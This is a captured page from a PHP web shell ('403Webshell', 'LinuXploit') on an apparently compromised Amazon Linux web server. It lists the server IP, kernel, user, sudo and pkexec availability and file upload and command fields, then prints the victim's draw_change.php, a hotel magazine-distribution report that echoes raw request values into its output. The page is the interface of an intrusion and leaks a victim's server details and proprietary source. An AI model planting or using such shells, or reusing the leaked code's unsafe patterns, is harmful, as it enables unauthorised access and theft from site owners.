403Webshell
Server IP : 104.21.21.239  /  Your IP : 216.73.216.11
Web Server : Apache/2.4.68 (Amazon Linux) OpenSSL/3.5.5
System : Linux ip-172-31-69-123.ec2.internal 6.1.176-223.369.amzn2023.x86_64 #1 SMP PREEMPT_DYNAMIC Fri Jul 24 13:34:27 UTC 2026 x86_64
User : ec2-user ( 1000)
PHP Version : 8.4.23
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : OFF  |  Sudo : ON  |  Pkexec : ON
Directory :  /home/hotel-prod/public_html/rpt/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /home/hotel-prod/public_html/rpt/draw_change.php
<?php include('mod/_mod_security.php'); ?>
<?php
	//var_dump($_GET);
	//exit;
	$search_str = '';
	$title_filter = '';
	if ($_GET['nd'] == '1') :
		$search_str .= "  AND v.magazines_delivered = 0 ";
		$title_filter .= ' - Not Delivered';
	endif;
	if (!empty($_GET['hrv'])) :
		$search_str .= "  AND h.hotel_retail_visitor_center = ".$db->quote($_GET['hrv'])." ";
		$title_filter .= ' - HRV: '.$_GET['hrv'];
	endif;
	if (!empty($_GET['cs'])) :
		$search_str .= "  AND h.concierge_service = ".$db->quote($_GET['cs'])." ";
		$title_filter .= ' - Concierge Svc: '.$_GET['cs'];
	endif;
	if (!empty($_GET['category'])) :
		$search_str .= "  AND h.category = ".$db->quote($_GET['category'])." ";
		$title_filter .= ' - Category: '.$_GET['category'];
	endif;
	if (!empty($_GET['route'])) :
		$search_str .= "  AND h.route_id = ".nz($_GET['route'], '0')." ";
		$sql_route = "SELECT * from routes WHERE route_id = ".nz($_GET['route'], '0')." ";
		$result_route = $db->query($sql_route) or die('Database Error!');
		if ($result_route->rowCount() > 0) :
			$row_route = $result_route->fetch(PDO::FETCH_OBJ);
		else :
			die('Invalid route!');
		endif;
		$title_filter .= ' - Route: '.$row_route->route_code;
	endif;
	$sql = "SELECT v.create_date AS verification_date, p.description AS product, h.hotel_name, h.bldg_nbr, h.street, h.city, h.state, h.zip, v.drop_location, v.old_qty, v.new_qty ".
			"FROM verifications v INNER JOIN hotels h ON (v.hotel_id = h.hotel_id) INNER JOIN products p ON (v.product_id = p.product_id) ".
			"WHERE DATE(v.create_date) >= ".nzdate($_GET['date_start'])." AND DATE(v.create_date) <= ".nzdate($_GET['date_end'])." AND change_draw = 1 ".$search_str." ".
			"ORDER BY h.hotel_name ";
	//echo " === ".$sql." === ";
	$result = $db->query($sql) or die('Database Error!');
	$margin_left = 0.5;
	$margin_right = 0.5;
	$margin_top = 1.0;
	$margin_bottom = 0.75;
	$margin_header = 0.5;
	$margin_footer = 0.5;
	if ($_GET['fmt'] == 'excel') :
		echo '<script>';
		echo "window.location.href = 'ajax.php?call=_export_excel&sql=".urlencode(sys_encrypt(sys_compress($sql), $_SESSION['rand_key']))."';";
		echo '</script>';
	elseif ($_GET['fmt'] == 'pdf') :
		$mpdf = new \Mpdf\Mpdf([
			'format' => 'Letter-L',
			'margin_left' => $margin_left * 25.4,
			'margin_right' => $margin_right * 25.4,
			'margin_top' => $margin_top * 25.4,
			'margin_bottom' => $margin_bottom * 25.4,
			'margin_header' => $margin_header * 25.4,
			'margin_footer' => $margin_footer * 25.4,
		]);
		$mpdf->debug = false;
		$mpdf->keep_table_proportions = true;
		$mpdf->SetProtection(array('copy','print'));
		$mpdf->SetTitle("Master Hotel Database - Report");
		$mpdf->SetAuthor("Davler Media Group");
		$mpdf->SetHTMLHeader('<table width="100%" style="vertical-align: bottom; font-size: 11pt; color: #000000;"><tr>'.
							'<td width="25%" style="text-align: left;" valign="top">Draw Change Report</td>'.
							'<td width="75%" style="text-align: right;" valign="top">Date Range: '.nzdate_display($_GET['date_start']).' - '.nzdate_display($_GET['date_end']).$title_filter.'</td>'.
							'</tr></table><br /><br />');
		$mpdf->SetHTMLFooter('<table width="100%" style="vertical-align: bottom; font-family: serif; font-size: 8pt; color: #000000; font-weight: bold; font-style: italic;"><tr>'.
							'<td width="33%"><span style="font-weight: bold; font-style: italic;">{DATE m/j/Y}</span></td>'.
							'<td width="33%" align="center" style="font-weight: bold; font-style: italic;">Page {PAGENO} of {nbpg}</td>'.
							'<td width="33%" style="text-align: right; ">Davler Media Group</td>'.
							'</tr></table>');
		$mpdf->SetDisplayMode('fullpage');
		$html = '<html><body style="font-family: Arial; font-size: 11pt; line-height: 12pt; ">';
		$html .= '<table width="100%" style="vertical-align: top; text-align:left; font-size: 10pt; color: #000000; font-weight: normal; border-collapse:collapse;">';
		$html .= '<thead style="font-weight:bold;"><tr>';
		$html .= '<td width="18%" align="center">Verification Date</td>';
		$html .= '<td width="8%" align="center">Product</td>';
		$html .= '<td width="22%" align="center">Hotel Name</td>';
		$html .= '<td width="5%" align="center">Bldg</td>';
		$html .= '<td width="15%" align="center">Street</td>';
		$html .= '<td width="15%" align="center">City</td>';
		$html .= '<td width="8%" align="center">State</td>';
		$html .= '<td width="5%" align="center">Zip</td>';
		$html .= '<td width="10%" align="center">Drop Loc</td>';
		$html .= '<td width="6%" align="center">Old Qty</td>';
		$html .= '<td width="6%" align="center">New Qty</td>';
		$html .= '</tr></thead><tbody>';
		while($row = $result->fetch(PDO::FETCH_OBJ)) :
			$html .= '<tr>';
			$html .= '<td>'.nzdate_display_datetime($row->verification_date).'</td>';
			$html .= '<td>'.$row->product.'</td>';
			$html .= '<td>'.$row->hotel_name.'</td>';
			$html .= '<td>'.$row->bldg_nbr.'</td>';
			$html .= '<td>'.$row->street.'</td>';
			$html .= '<td>'.$row->city.'</td>';
			$html .= '<td>'.$row->state.'</td>';
			$html .= '<td>'.$row->zip.'</td>';
			$html .= '<td>'.$row->drop_location.'</td>';
			$html .= '<td align="right">'.$row->old_qty.'</td>';
			$html .= '<td align="right">'.$row->new_qty.'</td>';
			$html .= '</tr>';
		endwhile;
		$html .= '</tbody></table>';
		$html .= '</body></html>';
		$html = utf8_encode($html);
		$mpdf->WriteHTML($html);
		$mpdf->Output(); 
	endif;
?>

Youez - 2016 - github.com/yon3zu
LinuXploit